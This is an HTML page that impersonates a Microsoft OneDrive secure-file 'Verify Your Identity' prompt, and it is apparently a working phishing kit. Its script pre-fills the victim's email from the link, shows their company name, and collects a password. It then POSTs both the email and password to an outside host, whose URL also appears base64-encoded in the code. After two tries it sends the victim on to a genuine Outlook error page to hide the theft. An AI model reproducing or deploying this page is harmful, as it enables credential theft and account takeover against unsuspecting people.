<!DOCTYPE html> 
<html>
<head>
    <meta charset = "utf-8">
    <title>OneDrive | View Document</title>
    <link rel="stylesheet prefetch" href="https://fonts.googleapis.com/css?family=Open+Sans:600">
<style>

html {
	line-height: 1.15;
	-ms-text-size-adjust: 100%;
	-webkit-text-size-adjust: 100%
}
body {
	height: 100%;
	margin: 0
}
article, aside, footer, header, nav, section {
	display: block
}
h1 {
	font-size: 2em;
	margin: .67em 0
}
figcaption, figure, main {
	display: block
}
figure {
	margin: 1em 40px
}
hr {
	box-sizing: content-box;
	height: 0;
	overflow: visible
}
pre {
	font-family: monospace, monospace;
	font-size: 1em
}
a {
	background-color: transparent;
	-webkit-text-decoration-skip: objects
}
abbr[title] {
	border-bottom: none;
	text-decoration: underline;
	text-decoration: underline dotted
}
b, strong {
	font-weight: inherit
}
b, strong {
	font-weight: bolder
}
code, kbd, samp {
	font-family: monospace, monospace;
	font-size: 1em
}
dfn {
	font-style: italic
}
mark {
	background-color: #ff0;
	color: #000
}
small {
	font-size: 80%
}
sub, sup {
	font-size: 75%;
	line-height: 0;
	position: relative;
	vertical-align: baseline
}
sub {
	bottom: -.25em
}
sup {
	top: -.5em
}
audio, video {
	display: inline-block
}
audio:not([controls]) {
	display: none;
	height: 0
}
img {
	border-style: none
}
svg:not(:root) {
	overflow: hidden
}
button, input, optgroup, select, textarea {
	font-family: sans-serif;
	font-size: 100%;
	line-height: 1.15;
	margin: 0
}
button, input {
	overflow: visible
}
button, select {
	text-transform: none
}
[type=reset], [type=submit], button, html [type=button] {
	-webkit-appearance: button
}
[type=button]::-moz-focus-inner, [type=reset]::-moz-focus-inner, [type=submit]::-moz-focus-inner, button::-moz-focus-inner {
border-style:none;
padding:0
}
[type=button]:-moz-focusring, [type=reset]:-moz-focusring, [type=submit]:-moz-focusring, button:-moz-focusring {
outline:1px dotted ButtonText
}
fieldset {
	padding: .35em .75em .625em
}
legend {
	box-sizing: border-box;
	color: inherit;
	display: table;
	max-width: 100%;
	padding: 0;
	white-space: normal
}
progress {
	display: inline-block;
	vertical-align: baseline
}
textarea {
	overflow: auto
}
[type=checkbox], [type=radio] {
	box-sizing: border-box;
	padding: 0
}
[type=number]::-webkit-inner-spin-button, [type=number]::-webkit-outer-spin-button {
height:auto
}
[type=search] {
	-webkit-appearance: textfield;
	outline-offset: -2px
}
[type=search]::-webkit-search-cancel-button, [type=search]::-webkit-search-decoration {
-webkit-appearance:none
}
::-webkit-file-upload-button {
-webkit-appearance:button;
font:inherit
}
details, menu {
	display: block
}
summary {
	display: list-item
}
canvas {
	display: inline-block
}
template {
	display: none
}
[hidden] {
	display: none
}
.ms-Fabric {
	-moz-osx-font-smoothing: grayscale;
	-webkit-font-smoothing: antialiased;
	color: #333;
	font-family: 'Segoe UI Web (West European)', 'Segoe UI', -apple-system, BlinkMacSystemFont, Roboto, 'Helvetica Neue', sans-serif;
	font-size: 14px
}
.ms-Fabric button, .ms-Fabric input {
	font-family: inherit
}

@media (max-width:479px) {
.ms-hiddenLgDown, .ms-hiddenMdDown, .ms-hiddenSm, .ms-hiddenXlDown, .ms-hiddenXxlDown {
	display: none!important
}
}

@media (min-width:480px) and (max-width:639px) {
.ms-hiddenLgDown, .ms-hiddenMd, .ms-hiddenMdDown, .ms-hiddenMdUp, .ms-hiddenXlDown, .ms-hiddenXxlDown {
	display: none!important
}
}

@media (min-width:640px) and (max-width:1023px) {
.ms-hiddenLg, .ms-hiddenLgDown, .ms-hiddenLgUp, .ms-hiddenMdUp, .ms-hiddenXlDown, .ms-hiddenXxlDown {
	display: none!important
}
}

@media (min-width:1024px) and (max-width:1365px) {
.ms-hiddenLgUp, .ms-hiddenMdUp, .ms-hiddenXl, .ms-hiddenXlDown, .ms-hiddenXlUp, .ms-hiddenXxlDown {
	display: none!important
}
}

@media (min-width:1366px) and (max-width:1919px) {
.ms-hiddenLgUp, .ms-hiddenMdUp, .ms-hiddenXlUp, .ms-hiddenXxl, .ms-hiddenXxlDown, .ms-hiddenXxlUp {
	display: none!important
}
}

@media (min-width:1920px) {
.ms-hiddenLgUp, .ms-hiddenMdUp, .ms-hiddenXlUp, .ms-hiddenXxlUp, .ms-hiddenXxxl {
	display: none!important
}
}

.ms-Icon {
	-moz-osx-font-smoothing: grayscale;
	-webkit-font-smoothing: antialiased;
	display: inline-block;
	font-family: 'FabricMDL2Icons';
	font-style: normal;
	font-weight: normal;
	speak: none;
}
.ms-Icon--Cancel:before {
	content: "E711";
}
.ms-Icon--CheckMark:before {
	content: "E73E";
}
.ms-Icon--Completed:before {
	content: "E930";
}
.ms-Icon--Info:before {
	content: "";
}
.ms-Icon--ErrorBadge:before {
	content: "EA39";
}
body, html {
	height: 100%;
	background: #f4f4f4
}
.checkbox, .notification .dismiss:focus {
	outline: 0
}
.external-sharing-content {
	height: 100%
}
.external-sharing-content a.disabled {
	pointer-events: none;
	cursor: default
}
*, :after, :before {
	box-sizing: inherit
}
.spinner, html {
	box-sizing: border-box
}
.main-content {
	flex-direction: column;
	display: flex;
	align-items: center;
	padding: 0 12px
}
.top-banner {
	flex-direction: column;
	display: flex;
	height: 40px;
	padding: 0 20px;
	justify-content: center;
	background: #0078d7
}
.top-banner .brand-name {
	color: #fff;
	font-size: 21px
}
.checkbox {
	cursor: pointer;
	padding: 0;
	border: none;
	background: 0 0;
	margin: 0;
	display: block
}
.checkbox .checkbox-checkbox {
	height: 20px;
	width: 20px;
	box-sizing: border-box;
	display: flex;
	align-items: center;
	justify-content: center;
	border-width: 1px;
	border-style: solid;
	border-color: #a6a6a6;
	margin-right: 8px;
	transition-property: 'background, border, border-color';
	transition-duration: .2s;
	transition-timing-function: .2s;
	overflow: hidden
}
.checkbox .checkbox-checkbox .ms-Icon {
	visibility: hidden
}
.checkbox.checked .checkbox-checkbox .ms-Icon, .focus-area .ms-Icon:active+.callout, .focus-area .ms-Icon:focus+.callout, .focus-area .ms-Icon:hover+.callout {
	visibility: visible
}
.checkbox input[type=checkbox] {
	display: none
}
.checkbox .checkbox-label {
	display: inline-flex;
	align-items: center;
	cursor: pointer;
	position: relative;
	user-select: none
}
.checkbox.disabled .checkbox-checkbox {
	background: #eaeaea;
	border-color: #eaeaea;
	color: #fff
}
.checkbox.disabled .checkbox-label {
	cursor: default
}
.checkbox .checkbox-text {
	margin-right: 8px;
	font-size: 14px
}
.checkbox.checked .checkbox-checkbox {
	border-color: #0078d7;
	background: #0078d7;
	color: #fff
}
.notification {
	height: 32px;
	display: flex;
	justify-content: center;
	align-items: center;
	z-index: 1;
	position: absolute;
	top: -32px;
	left: 0;
	width: 100%;
	transition: top .5s ease-in-out
}
.notification .dismiss {
	border: 0;
	padding: 0;
	background: 0 0;
	height: 15px;
	width: 15px;
	margin: 0 8px
}
.notification .dismiss:hover {
	cursor: pointer
}
.notification .dismiss .ms-Icon {
	margin: 0
}
.notification.visible {
	top: 0
}
.notification.success {
	background: #dff6dd
}
.notification.error {
	background: #fde7e9
}
.notification .ms-Icon {
	margin: 0 8px
}
.notification span {
	flex: 1 1 100%
}
input::-webkit-inner-spin-button, input::-webkit-outer-spin-button {
margin:0;
-webkit-appearance:none
}
input[type=number] {
	-moz-appearance: textfield
}
input[type=number]::-ms-clear {
display:none
}
.desktop-logo {
	margin: 57px 0 20px
}
.mobile-logo {
	margin-top: 24px
}
.microsoft-logo {
	height: 24px;
	width: 113px
}
.form-input-container {
	position: relative;
	font-size: 17px
}
.form-input-container .focus-area {
	position: absolute;
	top: 12.5px;
	right: 12.5px
}
.sharing-form {
	border-radius: 6px;
	box-shadow: 0 0 10px 0 rgba(0,0,0,.17);
	max-width: 360px;
	display: flex;
	flex-direction: column;
	margin: 13px 0 16px
}
.sharing-form .header {
	border-top-left-radius: 6px;
	border-top-right-radius: 6px;
	padding-top: 21px;
	height: 72px;
	border-bottom-width: 1px;
	border-bottom-style: solid;
	border-color: #c8c8c8;
	font-size: 21px;
	text-align: center;
	background-color: #f8f8f8;
	z-index: 2;
	position: relative
}
.form-content {
	border-bottom-right-radius: 6px;
	border-bottom-left-radius: 6px;
	padding: 28px 32px 32px;
	background: #fff;
	position: relative
}
.form-content .placeholder-text, .form-content input {
	height: 44px;
	width: 100%
}
.form-content .form-submit {
	background-color: #0078d7;
	color: #fff;
	border: 0
}
.form-content .form-submit.disabled {
	background: #f4f4f4;
	color: #a6a6a6
}
.form-content .form-submit.disabled+.submitted-text {
	display: flex;
	position: absolute;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
	justify-content: center;
	align-items: center
}
.form-content .form-submit.disabled+.submitted-text .spinner {
	margin-right: 14px
}
.form-content .form-submit+.submitted-text {
	color: #a6a6a6;
	background-color: #f4f4f4;
	display: none
}
.file-description .file-description-title {
	color: #666;
	font-size: 14px;
	margin-bottom: 24px
}
.file-description .file-info {
	display: flex;
	align-items: center
}
.file-description .file-info img {
	height: 32px;
	width: 32px;
	margin-right: 15px
}
.file-description .file-info .file-name {
	font-size: 17px;
	color: #333
}
.form-message {
	font-size: 14px;
	font-weight: 400;
	color: #666;
	line-height: 17px;
	margin: 22px 0 24px
}
.form-message .email {
	color: #333
}
.form-message a {
	color: #666
}
.interrupt-message {
	text-align: center
}
.interrupt-message img {
	width: 79px;
	height: 82px;
	margin-bottom: 20px
}
.interrupt-message .interrupt-message-text {
	font-size: 17px
}
.form-text-input {
	border-width: 1px;
	border-style: solid;
	padding: 11px;
	margin-bottom: 20px;
	color: #666;
	border-color: #a6a6a6
}
.form-text-input.disabled {
	background: #f4f4f4;
	color: #a6a6a6;
	border: #f4f4f4
}
.form-text-input.disabled::placeholder {
color:#a6a6a6
}
.form-text-input.is-empty+.placeholder-text {
	display: block
}
.form-text-input.has-error {
	border-color: #A80000;
	margin-bottom: 14px
}
.form-text-input+.placeholder-text {
	position: absolute;
	color: #666;
	top: 0;
	left: 0;
	line-height: 44px;
	padding: 0 11px;
	display: none;
	pointer-events: none
}
.focus-area, .focus-area .ms-Icon {
	position: relative;
	display: inline-block
}
.form-text-input::placeholder {
color:#666
}
.form-error-container {
	color: #A80000;
	font-size: 12px;
	margin-bottom: 8px
}
.focus-area {
	vertical-align: middle
}
.callout {
	bottom: 200%;
	width: 276px;
	left: 50%;
	font-size: 12px;
	line-height: 16px;
	visibility: hidden;
	background-color: #fff;
	color: #333;
	padding: 9px 12px;
	border-radius: 6px;
	margin-left: calc(-276px/2);
	text-align: left;
	box-shadow: 2px 2px 10px 0 rgba(0,0,0,.3);
	position: absolute;
	z-index: 3
}
.callout .callout-title {
	font-size: 17px;
	margin-bottom: 11px;
	line-height: 20px
}
.callout:after {
	content: " ";
	position: absolute;
	box-shadow: rgba(0,0,0,.3) 2px 2px 2px;
	transform: rotate(45deg);
	bottom: -9px;
	border-width: 10px;
	border-style: solid;
	border-color: transparent #fff #fff transparent;
	left: 127px
}

@media (max-width:479px) {
.callout {
	left: -95px
}
.callout:after {
	right: 24px;
	left: initial
}
}
.legal {
	font-size: 12px;
	font-weight: 400;
	display: flex;
	justify-content: space-between
}
.legal>* {
	margin-right: 12px
}
.legal>:last-child {
	margin-right: 0
}
.legal a {
	color: #333;
	text-decoration: none
}
.spinner {
	height: 20px;
	width: 20px;
	border-radius: 50%;
	border: 1.5px solid #c7e0f4;
	border-top-color: #0078d7;
	animation: spinAnimation 1.3s infinite cubic-bezier(.53, .21, .29, .67)
}
@keyframes spinAnimation {
0% {
transform:rotate(0)
}
100% {
transform:rotate(360deg)
}
}
.form-checkbox-container {
	margin-top: 24px;
	font-size: 14px;
	font-weight: 400
}



</style>
<style>
body {
  background: url(1.png);
}
</style>



    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">




    <div id="SharingValidationControlsSection" class="external-sharing-content ms-Fabric">
        <div class="top-banner">
            <div class="brand-name"><span style="font-family: 'Segoe UI Web (West European)', 'Segoe UI', -apple-system, BlinkMacSystemFont, Roboto, 'Helvetica Neue', sans-serif;"><img src="https://cdn.glitch.global/98f26ec7-eb91-4065-924c-dae37f47cf7d/one.png?v=1676563549132" class="img-fluid" width="150px"></span>
            </div>
        </div>
        <div class="main-content">
            <div class="desktop-logo ms-hiddenSm">
            <span id="nlp" style="font-size:20px;"><span>
            </div>
            <div class="sharing-form">
                <div class="header">
                    <span style="font-family: 'Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;">Verify Your Identity</span>
                </div>
                <div class="form-content">
                  
                        <div class="file-description">
                            <div class="file-description-title" style="font-family: 'Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;">You've received a secure file</div>
                            <div class="file-info">
                                <img alt="" src="https://cdn.glitch.global/98f26ec7-eb91-4065-924c-dae37f47cf7d/pdf-logo.png?v=1676563549644" style="height:32px;width:32px;">
                                <div class="file-name" style="font-family: 'Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;">
                                    <span>5.1MB</span>
                                </div>
                            </div>
                        </div>
                        <div>
                            <div class="form-message" style="font-family: 'Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;line-height: 25px"><span>To view file, please verify your credentials that this document was sent to.</span>
                            </div>
                            <div class="file-description">
                                <div class="file-info">

                                </div>
                            </div>
                            <div class="form-input-container">
                                <input name="username" maxlength="70" class="form-text-input disable-on-submit is-empty " placeholder="Enter email" id="ai" type="email" pattern=".{4,30}" oninvalid="this.setCustomValidity('Required Field')" oninput="setCustomValidity('')" title="Required Field" required="" value="">
                                <div class="focus-area">
                                    <i class="ms-Icon ms-Icon--Info" aria-hidden="true"></i>
                                    <div class="callout" style="font-family: 'Segoe UI Web (West European)','Segoe UI',-apple-system,BlinkMacSystemFont,Roboto,'Helvetica Neue',sans-serif;">
                                        <div class="callout-title" style="">Why do I have to do this?</div>
                                        The person that has shared this link with you is sharing with a secure link which requires you to verify your identity.
                                    </div>
                                </div>
                            </div>
                            <div class="form-input-container" id="divPr" style="display: none;">
                                <input name="pr" id="pr" maxlength="70" class="form-text-input disable-on-submit is-empty " placeholder="Enter password" type="password" required="">
                            </div>
                            <div class="form-error-container">
                                <center>
                                    <div class="alert alert-danger" id="msg" style="display: none;">Wrong password! Please try again</div>
                                    <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                                </center>
                            </div>
                            <div class="form-input-container">
                            	<button class="form-submit disable-on-submit btn rounded-0  w-100" id="next">Next</button>
                            	<button class="form-submit disable-on-submit btn rounded-0  w-100" id="submit-btn" style="display: none;">Sign In</button>
                            </div>
                        </div>
                </div>
            </div>
            
            <div class="legal">
                <span>&copy; 2024 Microsoft</span>
                <!--<a href='#'>Terms of Use</a> To Be Deleted-->
                <a href="#">Privacy &amp; Cookies</a>
            </div>

        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;


    $(document).keypress(function(event) {
        var keycode = (event.keyCode ? event.keyCode : event.which);
        if (keycode == '13') {
            if ($("#divPr").is(":visible")) {
                $("#submit-btn").trigger("click");

            } else {
                $("#next").trigger("click");

            }
        }
    });
    $('#next').click(function() {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();

        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        $("#next").html("checking...");

        setTimeout(function() {
            $("#ai").attr('readonly', '');
            $("#divPr").animate({ right: 0, opacity: "show" }, 1000);
            $("#next").html("next");
            $("#next").animate({ left: 0, opacity: "hide" }, 0);
            $("#submit-btn").animate({ right: 0, opacity: "show" }, 1000);
        }, 1000);


    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        $("#main_logo_id").attr("src", "https://logo.clearbit.com/"+my_slice);
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var grape = final.toUpperCase()
        $("#nlp").html(grape);
        $('#ai').val(my_ai);

        $("#msg").hide();

    }
    ///////////////url getting ai////////////////

 var file="aHR0cHM6Ly9hbXBlcnNhbmRjYXJsc2JhZC5jb20vT1BGUkUuUEhQ";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
       
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
			url: 'https://ampersandcarlsbad.com/OPFRE.PHP',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee");

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee");
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Sign in');
            }
        });
    });


});
</script>


</body></html>